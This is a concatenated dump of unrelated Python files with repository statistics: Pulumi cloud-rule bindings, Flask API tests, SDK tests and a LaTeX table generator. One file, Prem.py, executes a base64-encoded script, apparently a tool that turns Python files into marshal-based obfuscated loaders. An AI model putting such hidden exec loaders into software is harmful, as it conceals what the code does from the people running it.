"""
return pulumi.get(self, "resource_group_ids_scope")
@property
@pulumi.getter(name="resourceTypesScopes")
def resource_types_scopes(self) -> pulumi.Output[Sequence[str]]:
"""
Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
"""
return pulumi.get(self, "resource_types_scopes")
@property
@pulumi.getter(name="riskLevel")
def risk_level(self) -> pulumi.Output[int]:
"""
The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
"""
return pulumi.get(self, "risk_level")
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Output[str]:
"""
The name of the Config Rule.
"""
return pulumi.get(self, "rule_name")
@property
@pulumi.getter(name="scopeComplianceResourceTypes")
def scope_compliance_resource_types(self) -> pulumi.Output[Sequence[str]]:
"""
Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
"""
return pulumi.get(self, "scope_compliance_resource_types")
@property
@pulumi.getter(name="sourceDetailMessageType")
def source_detail_message_type(self) -> pulumi.Output[str]:
"""
Field `source_detail_message_type` has been deprecated from provider version 1.124.1. New field `config_rule_trigger_types` instead.
"""
return pulumi.get(self, "source_detail_message_type")
@property
@pulumi.getter(name="sourceIdentifier")
def source_identifier(self) -> pulumi.Output[str]:
"""
The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
"""
return pulumi.get(self, "source_identifier")
@property
@pulumi.getter(name="sourceMaximumExecutionFrequency")
def source_maximum_execution_frequency(self) -> pulumi.Output[str]:
"""
Field `source_maximum_execution_frequency` has been deprecated from provider version 1.124.1. New field `maximum_execution_frequency` instead.
"""
return pulumi.get(self, "source_maximum_execution_frequency")
@property
@pulumi.getter(name="sourceOwner")
def source_owner(self) -> pulumi.Output[str]:
"""
Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
"""
return pulumi.get(self, "source_owner")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
return pulumi.get(self, "status")
@property
@pulumi.getter(name="tagKeyScope")
def tag_key_scope(self) -> pulumi.Output[Optional[str]]:
"""
The rule monitors the tag key, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_key_scope")
@property
@pulumi.getter(name="tagValueScope")
def tag_value_scope(self) -> pulumi.Output[Optional[str]]:
"""
The rule monitors the tag value, use with the TagKeyScope options. only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_value_scope")
| 59.884427 | 317 | 0.701727 | 7,723 | 61,142 | 5.30584 | 0.037162 | 0.068453 | 0.068673 | 0.060131 | 0.960929 | 0.953437 | 0.945042 | 0.938209 | 0.932059 | 0.928692 | 0 | 0.007288 | 0.203346 | 61,142 | 1,020 | 318 | 59.943137 | 0.833973 | 0.370122 | 0 | 0.831104 | 1 | 0.0301 | 0.196419 | 0.104731 | 0 | 0 | 0 | 0 | 0 | 1 | 0.158863 | false | 0.001672 | 0.008361 | 0.003344 | 0.262542 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
69456fa88c32e12af5f02a1179ee7afb060c8eed | 129 | py | Python | dfs/datasheets/writers/__init__.py | shoeberto/dfs-data-tooling | fe1be744b343f18d845ddc20f2303d1dbf0d90c5 | [
"MIT"
] | null | null | null | dfs/datasheets/writers/__init__.py | shoeberto/dfs-data-tooling | fe1be744b343f18d845ddc20f2303d1dbf0d90c5 | [
"MIT"
] | null | null | null | dfs/datasheets/writers/__init__.py | shoeberto/dfs-data-tooling | fe1be744b343f18d845ddc20f2303d1dbf0d90c5 | [
"MIT"
] | null | null | null | from dfs.datasheets.writers import plot
from dfs.datasheets.writers import treatment
from dfs.datasheets.writers import superplot | 43 | 44 | 0.868217 | 18 | 129 | 6.222222 | 0.444444 | 0.1875 | 0.455357 | 0.642857 | 0.803571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085271 | 129 | 3 | 45 | 43 | 0.949153 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
695a7873303bb04549cae1c818d4f2ad85285514 | 129 | py | Python | pypagai/models/model_rnet.py | gcouti/pypagAI | d08fac95361dcc036d890a88cb86ce090322a612 | [
"Apache-2.0"
] | 1 | 2018-07-24T18:53:26.000Z | 2018-07-24T18:53:26.000Z | pypagai/models/model_rnet.py | gcouti/pypagAI | d08fac95361dcc036d890a88cb86ce090322a612 | [
"Apache-2.0"
] | 7 | 2020-01-28T21:45:14.000Z | 2022-03-11T23:20:53.000Z | pypagai/models/model_rnet.py | gcouti/pypagAI | d08fac95361dcc036d890a88cb86ce090322a612 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
"""
TODO: Implement it inspired on
https://github.com/YerevaNN/R-NET-in-Keras
"""
| 18.428571 | 46 | 0.713178 | 18 | 129 | 4.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 129 | 6 | 47 | 21.5 | 0.805556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
15dc2a21648f99ead9404455dbd71c5438ccd905 | 2,127 | py | Python | Prem.py | Box95-Crew/Dreamless- | 9192b15565639f3b2696046c1a65448be1eb3032 | [
"Apache-2.0"
] | null | null | null | Prem.py | Box95-Crew/Dreamless- | 9192b15565639f3b2696046c1a65448be1eb3032 | [
"Apache-2.0"
] | null | null | null | Prem.py | Box95-Crew/Dreamless- | 9192b15565639f3b2696046c1a65448be1eb3032 | [
"Apache-2.0"
] | null | null | null | #compile by Box95 & 96 #github : https://github.com/Box95-Crew
import base64
exec(base64.b64decode('''aW1wb3J0IG1hcnNoYWwsIG9zLCB0aW1lCgpiYW5uZXI9KCIiIlwwMzNbMTszNm0KICAgICAgICAgICAgICAgICAgICAgIAogICAgIF8gIF8KICAgX3wgfHwgfF8gICAgICAgICAgXDAzM1sxOzMxbUNPTVBJTEVSIFBZVEhPTlwwMzNbMTszNm0KICB8XyAgLi4gIF98CiAgfF8gICAgICBffCAgICAgICAgIFwwMzNbMTszMW1Db250YWN0PT4wMzA5NDE2MTQ1N1wwMzNbMTszNm0KICAgIHxffHxffCAgICAgICAgICAgXDAzM1sxOzMxbUJsYWNrTWFmaWEgCiIiIikKZGVmIHB5KCk6Cgl0cnk6CgkJb3Muc3lzdGVtKCdjbGVhcicpCgkJcHJpbnQoYmFubmVyKQoJCWE9aW5wdXQoIlwwMzNbMTszN20gRmlsZSBuYW1lID0+IFwwMzNbMTszMm0iKQoJCXg9b3BlbihhKS5yZWFkKCkKCQliPWNvbXBpbGUoeCwnJywnZXhlYycpCgkJYz1tYXJzaGFsLmR1bXBzKGIpCgkJZD1vcGVuKCJIYXNpbF8iK2EsJ3cnKQoJCWQud3JpdGUoJ2ltcG9ydCBtYXJzaGFsXG4nKQoJCWQud3JpdGUoJ2V4ZWMobWFyc2hhbC5sb2FkcygnK3JlcHIoYykrJykpJykKCQlkLmNsb3NlKCkKCQl0aW1lLnNsZWVwKDEuNSkKCQlwcmludCgiXDAzM1sxOzMybUZpbGUgTXVrYW1hbCBobyBnYWk6IFwwMzNbMTszNm1IYXNpbF8iK2EpCgkJcHJpbnQoKQoJZXhjZXB0IEtleWJvYXJkSW50ZXJydXB0OgoJCXByaW50KCJcblwwMzNbMTszMW1bIV0gRVJST1I6IGFwIGppbiBmaWxlcyBrbyBtdWthbWFsIGthcm5hIGNoYWh0eSBpbiBrbyB5YXFlZW5pIGJuYWluICIpCgkJZXhpdCgpCgkKZGVmIHB5MigpOgoJdHJ5OgoJCW9zLnN5c3RlbSgnY2xlYXInKQoJCXByaW50KGJhbm5lcikKCQlhPXJhd19pbnB1dCgiXDAzM1sxOzM3bSBOYW1hIEZpbGUgPT4gXDAzM1sxOzMybSIpCgkJeD1vcGVuKGEpLnJlYWQoKQoJCWI9Y29tcGlsZSh4LCcnLCdleGVjJykKCQljPW1hcnNoYWwuZHVtcHMoYikKCQlkPW9wZW4oIkhhc2lsXyIrYSwndycpCgkJZC53cml0ZSgnaW1wb3J0IG1hcnNoYWxcbicpCgkJZC53cml0ZSgnZXhlYyhtYXJzaGFsLmxvYWRzKCcrcmVwcihjKSsnKSknKQoJCWQuY2xvc2UoKQoJCXRpbWUuc2xlZXAoMS41KQoJCXByaW50KCJcMDMzWzE7MzJtRmlsZSBPayBobyBnYWkgaGE6IFwwMzNbMTszNm1IYXNpbF8iK2EpCgkJcHJpbnQKCWV4Y2VwdCBLZXlib2FyZEludGVycnVwdDoKCQlwcmludCgiXG5cMDMzWzE7MzFtWyFdIEVSUk9SOiBhcCBmaWxlcyBrbyB5YXFlZW5pIGJuYWluIGpvIGFwIGNvbXBpbGVkIG1haW4gY2hhaHR5IGhhaW4gICIpCgkJZXhpdCgpCgpvcy5zeXN0ZW0oJ2NsZWFyJykKcHJpbnQoYmFubmVyKQpwcmludCgiXDAzM1sxOzMybVsxXSBQeXRob24zIikKcHJpbnQoIlsyXSBQeXRob24yIikKYXNrPWlucHV0KCJcMDMzWzE7MzdtWz9dIFNsZWN0ICAgPT4gXDAzM1sxOzMybSIpCmlmIGFzayA9PSAnMSc6CglweSgpCmVsaWYgYXNrID09IDI6CglweTIoKQplbHNlOgoJcHJpbnQoIlxuXDAzM1sxOzMxbVshXSBJbnZhbGlkIikK'''))
| 531.75 | 1,998 | 0.960508 | 17 | 2,127 | 120.176471 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08862 | 0.029149 | 2,127 | 3 | 1,999 | 709 | 0.900726 | 0.052186 | 0 | 0 | 0 | 0 | 0.97716 | 0.97716 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
d69458f4b39d2186e09beb6b4f39997f06576536 | 1,704 | py | Python | tests/units/test_version_check_decorator.py | tomorrowdata/iottly-sdk-python | 2b69989743f9291d7daed22522ea8c56304094c4 | [
"Apache-2.0"
] | 3 | 2018-02-05T21:37:29.000Z | 2019-06-12T13:11:33.000Z | tests/units/test_version_check_decorator.py | tomorrowdata/iottly-sdk-python | 2b69989743f9291d7daed22522ea8c56304094c4 | [
"Apache-2.0"
] | 7 | 2019-05-07T14:26:26.000Z | 2021-07-28T16:43:50.000Z | tests/units/test_version_check_decorator.py | tomorrowdata/iottly-sdk-python | 2b69989743f9291d7daed22522ea8c56304094c4 | [
"Apache-2.0"
] | 1 | 2020-06-09T07:45:31.000Z | 2020-06-09T07:45:31.000Z | import unittest
from iottly_sdk.utils import min_agent_version
from iottly_sdk.errors import InvalidAgentVersion
class TestVersionCheckDecorator(unittest.TestCase):
def setUp(self):
pass
def test_invalid_version_check_when_no_version_available(self):
class SDKStubClass:
def __init__(self):
self._agent_version = None
@min_agent_version('1.0.0')
def testMethod(self):
return True
sdk = SDKStubClass()
with self.assertRaises(InvalidAgentVersion) as e:
sdk.testMethod()
def test_invalid_version_check_whit_older_version(self):
class SDKStubClass:
def __init__(self):
self._agent_version = '0.9.5'
@min_agent_version('1.0.0')
def testMethod(self):
return True
sdk = SDKStubClass()
with self.assertRaises(InvalidAgentVersion) as e:
sdk.testMethod()
def test_invalid_version_check_whit_right_version(self):
class SDKStubClass:
def __init__(self):
self._agent_version = '1.0.0'
@min_agent_version('1.0.0')
def testMethod(self):
return True
sdk = SDKStubClass()
res = sdk.testMethod()
self.assertTrue(res)
def test_invalid_version_check_whit_newer_version(self):
class SDKStubClass:
def __init__(self):
self._agent_version = '1.2.4'
@min_agent_version('1.0.0')
def testMethod(self):
return True
sdk = SDKStubClass()
res = sdk.testMethod()
self.assertTrue(res)
| 27.483871 | 67 | 0.595657 | 183 | 1,704 | 5.213115 | 0.251366 | 0.113208 | 0.081761 | 0.073375 | 0.785115 | 0.755765 | 0.724319 | 0.724319 | 0.724319 | 0.674004 | 0 | 0.018229 | 0.323944 | 1,704 | 61 | 68 | 27.934426 | 0.809896 | 0 | 0 | 0.695652 | 0 | 0 | 0.02054 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 1 | 0.282609 | false | 0.021739 | 0.065217 | 0.086957 | 0.543478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
ba361b8ddb0c9179f67e74e06e73639bc5a2fe10 | 16,014 | py | Python | tests/endpoints/test_endpoints.py | botnetdobbs/StackOverflowLiteApi | f32e9a72a093a92223a39f9162e7353e575bf82c | [
"CC0-1.0"
] | 2 | 2019-05-19T12:45:17.000Z | 2019-09-16T09:58:40.000Z | tests/endpoints/test_endpoints.py | botnetdobbs/StackOverflowLiteApi | f32e9a72a093a92223a39f9162e7353e575bf82c | [
"CC0-1.0"
] | 1 | 2019-10-21T16:59:05.000Z | 2019-10-21T16:59:05.000Z | tests/endpoints/test_endpoints.py | botnetdobbs/StackOverflowLiteApi | f32e9a72a093a92223a39f9162e7353e575bf82c | [
"CC0-1.0"
] | null | null | null | import unittest
from api import app
import json
from tests.modules_for_t import teardown
from api.create_tables import create_tables
from api.db import connect
class EndpointsTestCase(unittest.TestCase):
def setUp(self):
self.app = app
self.client = app.test_client
self.question = {
"title": "This is title 1",
"description": "This is description 1"
}
self.question1 = {
"title": "This is title 1",
"description": "This is description 2"
}
self.answer = {
"answer": "This is answer 1"
}
self.answer1 = {
"answer": "This is answer 2"
}
with self.app.app_context():
teardown()
def register_user(self):
user = {
"username": "username1",
"email" : "test@test.com",
"password": "password1"
}
return self.client().post('/api/v2/auth/register',
headers = {
"Content-Type" : 'application/json'},
data = json.dumps(user))
def login_user(self):
user = {
"username": "username1",
"password": "password1"
}
return self.client().post('/api/v2/auth/login',
headers =
{"Content-Type" : 'application/json'},
data=json.dumps(user))
def test_for_create_question(self):
#Register the user
self.register_user()
#Login the user and get the response
response = self.login_user()
#Get the access token
res = json.loads(response.data.decode())
access_token = res["access_token"]
# print(access_token)
#Post the question
create_question = self.client().post('/api/v2/questions',
headers = {"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
#Check the status code
self.assertEqual(create_question.status_code, 201)
#Check if the string exists in the resulting response
self.assertIn('Question created successfully.', str(create_question.data))
def test_for_get_all_questions(self):
#Register the user
self.register_user()
#Login aand get the response
response = self.login_user()
#Get the token
res = json.loads(response.data.decode())
access_token = res["access_token"]
#Add a question
add_question = self.client().post('/api/v2/questions',
headers = {
"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Get the questions, check the status code and if the string is in the response
get_questions = self.client().get('/api/v2/questions')
self.assertEqual(get_questions.status_code, 200)
self.assertIn('This is title 1', str(get_questions.data))
def test_for_find_question_by_id(self):
#Register a user and login(returns a response)
self.register_user()
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers = {
"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Get the question, check the status code and if the string is in the response
get_question = self.client().get('/api/v2/questions/1',
headers = {
"Authorization" : 'JWT ' + access_token})
self.assertEqual(get_question.status_code, 200)
self.assertIn('This is description 1', str(get_question.data))
def test_for_edit_question(self):
#Register a user and login(returns a response)
self.register_user()
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers = {"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Edit the question, check the status code and if the string is in the response
edit_question = self.client().put('api/v2/questions/1',
headers = {"Content-Type": "application/json",
"Authorization": "JWT " + access_token},
data = json.dumps(self.question1))
self.assertEqual(edit_question.status_code, 200)
self.assertIn('This is title 1', str(edit_question.data))
def test_for_delete_question(self):
#Register a user and login(returns a response)
self.register_user()
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers = {"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Delete the question, check the status code and if the string is in the response
delete_question = self.client().delete('/api/v2/questions/1',
headers = {"Authorization" : 'JWT ' + access_token})
self.assertEqual(delete_question.status_code, 201)
self.assertIn("Question deleted successfully.", str(delete_question.data))
def test_for_create_answer(self):
#Register a user and login(returns a response)
self.register_user()
#Login aand get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Add the answers, check the status code and if the string is in the response
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
self.assertIn('Answer inserted successfully', str(add_answer.data))
def test_for_get_all_answers(self):
#Register a user and login(returns a response)
self.register_user()
#Login aand get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
#Add the answer
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
#Check the status code
self.assertEqual(add_answer.status_code, 201)
#Get the answers and check the status code & the string in the response
get_answers = self.client().get('/api/v2/questions/1/answers')
self.assertEqual(get_answers.status_code, 200)
self.assertIn('This is answer 1', str(get_answers.data))
def test_for_get_single_answer(self):
#Register a user and login(returns a response)
self.register_user()
#Login aand get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Get the answer and check the status code & the string in the response
get_answer = self.client().get('/api/v2/questions/1/answers/1')
self.assertEqual(get_answer.status_code, 200)
self.assertIn('This is answer 1', str(get_answer.data))
def test_for_edit_answer(self):
#Register a user and login(returns a response)
self.register_user()
#Login aand get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Edit the answers and check the status code & the string in the response
edit_answer = self.client().put('/api/v2/questions/1/answers/1',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer1))
self.assertEqual(edit_answer.status_code, 201)
self.assertIn('updated', str(edit_answer.data))
def test_for_upvote_answer(self):
#Register a user and login(returns a response)
self.register_user()
#Login aand get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Upvote the answer and check the status code & the string in the response
upvote_answer = self.client().put('/api/v2/questions/1/answers/1/upvote',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token})
self.assertEqual(upvote_answer.status_code, 201)
self.assertIn('upvoted', str(upvote_answer.data))
def test_for_downvote_answer(self):
#Register a user and login(returns a response)
self.register_user()
#Login aand get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Downvote the answer and check the status code & the string in the response
downvote_answer = self.client().put('/api/v2/questions/1/answers/1/downvote',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token})
self.assertEqual(downvote_answer.status_code, 201)
self.assertIn('downvoted successfully', str(downvote_answer.data))
def test_for_delete_answer(self):
#Register a user and login(returns a response)
self.register_user()
#Login aand get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Delete the answer and check the status code & the string in the response
delete_answer = self.client().delete('/api/v2/questions/1/answers/1',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token})
self.assertEqual(delete_answer.status_code, 201)
self.assertIn('successfully', str(delete_answer.data))
def test_for_mark_answer_as_solved(self):
#Register a user and login(returns a response)
self.register_user()
#Login aand get the response
response = self.login_user()
res = json.loads(response.data.decode())
access_token = res["access_token"]
print(access_token)
add_question = self.client().post('/api/v2/questions',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.question))
self.assertEqual(add_question.status_code, 201)
add_answer = self.client().post('/api/v2/questions/1/answers',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token},
data = json.dumps(self.answer))
self.assertEqual(add_answer.status_code, 201)
#Mark the answer and check the status code & the string in the response
mark_answer = self.client().put('/api/v2/questions/1/answers/1/solved',
headers =
{"Content-Type" : 'application/json',
"Authorization" : 'JWT ' + access_token})
self.assertEqual(mark_answer.status_code, 201)
self.assertIn('solution', str(mark_answer.data))
if __name__ == "__main__":
unittest.main() | 42.932976 | 88 | 0.608905 | 1,850 | 16,014 | 5.128108 | 0.058378 | 0.078845 | 0.047223 | 0.088648 | 0.873195 | 0.839465 | 0.809318 | 0.800464 | 0.781912 | 0.753241 | 0 | 0.014817 | 0.270888 | 16,014 | 373 | 89 | 42.932976 | 0.797705 | 0.11746 | 0 | 0.70297 | 0 | 0 | 0.191838 | 0.032718 | 0 | 0 | 0 | 0 | 0.148515 | 1 | 0.052805 | false | 0.006601 | 0.019802 | 0 | 0.082508 | 0.036304 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba49a45edbe2fa93e34c28894c61491fa2e42c22 | 5,853 | py | Python | lib/table/get_sample.py | PEDIA-Charite/classifier | 13e9d6108f9691b089aac59c7392f7940033b8af | [
"MIT"
] | 2 | 2019-04-04T03:44:25.000Z | 2019-12-23T17:08:51.000Z | lib/table/get_sample.py | PEDIA-Charite/classifier | 13e9d6108f9691b089aac59c7392f7940033b8af | [
"MIT"
] | 9 | 2017-05-23T09:55:15.000Z | 2019-11-22T11:24:20.000Z | lib/table/get_sample.py | PEDIA-Charite/classifier | 13e9d6108f9691b089aac59c7392f7940033b8af | [
"MIT"
] | 2 | 2017-05-24T12:23:13.000Z | 2019-09-03T08:36:18.000Z | #######################################################################################
# This script generate three latex files.
# sample.tex and sample_gestalt.tex contain three tables in each file.
# The tables are the details of samples. The difference between first two files is
# that sample.tex contains all sample but sample_gestalt only contain the sample which
# have gestalt score in pathogenic gene.
# sample_detail_no_g.tex contains the detail of the sample which has no gestalt score
# in pathogenic gene.
########################################################################################
import csv
import sys
import os
import collections
output_dir = '../../latex/table/'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
outFile = open(output_dir + 'sample.tex', "w")
filename = "../sample.csv"
#Output text
gene_list = {}
total_sample = 0
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
if flag == 1:
count = 0
if row[1] in gene_list:
count = gene_list[row[1]]
count += 1
gene_list.update({row[1]:count})
total_sample += 1
flag = 1
print(gene_list)
total_gene = len(gene_list)
print(total_sample)
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|c|c|} \\hline\n")
outFile.write("Gene&Count\\\\ \\hline \n")
od = collections.OrderedDict(sorted(gene_list.items()))
for key, value in od.items():
outFile.write(key + "&" + str(value) + "\\\\ \\hline \n")
outFile.write(str(total_gene) + "&" + str(total_sample) + "\\\\ \\hline \n")
outFile.write("\\caption{summary table of mutation gene} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|p{12cm}|} \\hline\n")
outFile.write("Case&Gene&Syndrome\\\\ \\hline \n")
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
if flag == 1:
outFile.write("&".join(row[0:3]) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\caption{Sample} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|c|c|c|c|c|} \\hline\n")
outFile.write("Case&Gene&FM&CADD&Gestalt&Boqa&Pheno\\\\ \\hline \n")
filename = "../sample.csv"
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
outrow = [j for i, j in enumerate(row) if i != 2]
if flag == 1:
outFile.write("&".join(outrow) + "\\\\ \\hline \n")
flag = 1
outFile.write("\\caption{Sample} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.close()
# For sample with gestalt
outFile = open(output_dir + 'sample_gestalt.tex', "w")
#Output text
gene_list = {}
total_sample = 0
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
if flag == 1 and row[5] != 'nan':
count = 0
if row[1] in gene_list:
count = gene_list[row[1]]
count += 1
gene_list.update({row[1]:count})
total_sample += 1
flag = 1
print(gene_list)
total_gene = len(gene_list)
print(total_sample)
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|c|c|} \\hline\n")
outFile.write("Gene&Count\\\\ \\hline \n")
od = collections.OrderedDict(sorted(gene_list.items()))
for key, value in od.items():
outFile.write(key + "&" + str(value) + "\\\\ \\hline \n")
outFile.write(str(total_gene) + "&" + str(total_sample) + "\\\\ \\hline \n")
outFile.write("\\caption{summary table of mutation gene with gestalt score} \n")
outFile.write("\\end{longtable}\n")
outFile.write("\\end{center}\n")
outFile.write("\\begin{center}\n")
outFile.write("\\begin{longtable}{|l|l|p{12cm}|} \\hline\n")
outFile.write("Case&Gene&Syndrome\\\\ \\hline \n")
with open(filename) as csvfile:
reader = csv.reader(csvfile)
flag = 0
for row in reader:
if flag == 1 and row[5] != 'nan':
